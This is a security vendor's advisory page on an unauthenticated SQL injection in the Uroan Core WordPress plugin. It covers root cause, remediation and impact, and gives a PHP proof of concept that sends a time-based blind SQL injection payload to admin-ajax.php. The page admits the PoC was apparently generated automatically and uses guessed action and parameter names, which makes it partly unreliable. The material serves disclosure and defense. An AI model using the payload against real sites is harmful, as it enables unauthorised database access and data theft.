Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-69365: Uroan Core <= 1.4.4 – Unauthenticated SQL Injection (uroan-core)

Plugin uroan-core
Severity High (CVSS 7.5)
CWE 89
Vulnerable Version 1.4.4
Patched Version
Disclosed January 27, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69365 (metadata-based):
This vulnerability is an unauthenticated SQL injection in the Uroan Core WordPress plugin, affecting versions up to and including 1.4.4. The flaw allows attackers to execute arbitrary SQL commands against the site’s database by manipulating a user-supplied parameter, leading to potential data exfiltration.

Atomic Edge research infers the root cause is a failure to properly sanitize or parameterize user input before its inclusion in an SQL query. The description cites insufficient escaping and lack of preparation. This indicates the plugin likely constructs SQL statements by directly concatenating user-controlled variables, bypassing the use of WordPress’s secure `$wpdb->prepare()` method. These conclusions are inferred from the CWE-89 classification and the public description, as the source code is unavailable for confirmation.

Exploitation likely occurs via a public-facing WordPress hook, such as an AJAX endpoint registered with `wp_ajax_nopriv_` or a REST API route. An attacker would send a crafted HTTP request to `/wp-admin/admin-ajax.php` with an `action` parameter containing a value like `uroan_core_action`. The malicious SQL payload would be placed in another request parameter, such as `id` or `slug`. A typical payload might use a time-based blind injection technique, like `1′ AND SLEEP(5)– -`, to extract data.

Remediation requires modifying the vulnerable code to use WordPress’s built-in database abstraction layer correctly. All user input must be passed as parameters to `$wpdb->prepare()` for proper escaping and query preparation. Input validation using `sanitize_*` functions should also be implemented as a secondary defense. The patched version would replace string concatenation in SQL statements with prepared statements.

The primary impact is confidentiality loss, as reflected in the CVSS vector (C:H/I:N/A:N). Successful exploitation enables unauthenticated attackers to extract sensitive information from the database. This can include user credentials, personally identifiable information, and other private site data, potentially leading to further compromise.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-69365 - Uroan Core <= 1.4.4 - Unauthenticated SQL Injection
<?php
/**
 * Proof-of-concept for CVE-2025-69365.
 * This script attempts to demonstrate a time-based blind SQL injection.
 * The exact endpoint and parameter names are inferred from WordPress plugin conventions.
 * Assumptions:
 *   1. The vulnerable endpoint is `/wp-admin/admin-ajax.php`.
 *   2. The AJAX action hook is derived from the plugin slug ('uroan_core').
 *   3. A vulnerable parameter exists, here assumed to be 'item_id'.
 */

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; // CONFIGURE THIS

// Inferred AJAX action for unauthenticated users.
$action = 'uroan_core_get_data';

// Parameter assumed to be vulnerable.
$vuln_param = 'item_id';

// Time-based blind SQL injection payload.
// This payload causes a 5-second delay if the injection is successful.
$payload = "1' AND (SELECT SLEEP(5))-- -";

$post_data = array(
    'action' => $action,
    $vuln_param => $payload
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 15); // Increase timeout to detect delay

$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
curl_close($ch);

$request_duration = $end_time - $start_time;

if ($request_duration > 5) {
    echo "[+] Potential SQL Injection successful. Response delayed by " . round($request_duration, 2) . " seconds.n";
} else {
    echo "[-] No time delay detected. The endpoint or parameter may be incorrect, or the site may not be vulnerable.n";
}
echo "Response snippet: " . substr($response, 0, 200) . "n";

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School